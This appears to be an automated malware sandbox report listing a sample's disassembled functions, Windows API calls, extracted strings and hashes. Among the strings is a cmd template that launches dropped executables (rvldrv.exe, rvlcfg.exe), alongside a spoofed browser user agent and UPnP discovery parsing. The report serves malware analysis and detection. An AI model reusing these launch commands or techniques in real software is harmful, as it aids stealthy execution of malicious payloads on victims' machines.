                                                                                                                                                                                              • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                              • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3956458805-507759092
                                                                                                                                                                                              • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                              • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                              • String ID: $D$open
                                                                                                                                                                                              • API String ID: 3787208655-2182757814
                                                                                                                                                                                              • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                              • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 1457358591-507759092
                                                                                                                                                                                              • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                              • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                              • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                              • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                              • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                              • %comspec%, xrefs: 004066EE
                                                                                                                                                                                              • cl@, xrefs: 004066A0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                              • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                              • API String ID: 1147330536-497122036
                                                                                                                                                                                              • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                              • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 671207744-0
                                                                                                                                                                                              • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleeprecvfrom
                                                                                                                                                                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                              • API String ID: 668330359-3973262388
                                                                                                                                                                                              • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                              • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                              • API String ID: 2743515581-2960703779
                                                                                                                                                                                              • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                              • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                              • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                              • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                              • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 442028454-507759092
                                                                                                                                                                                              • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                              • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                              • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                              • API String ID: 1447977647-3252725368
                                                                                                                                                                                              • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
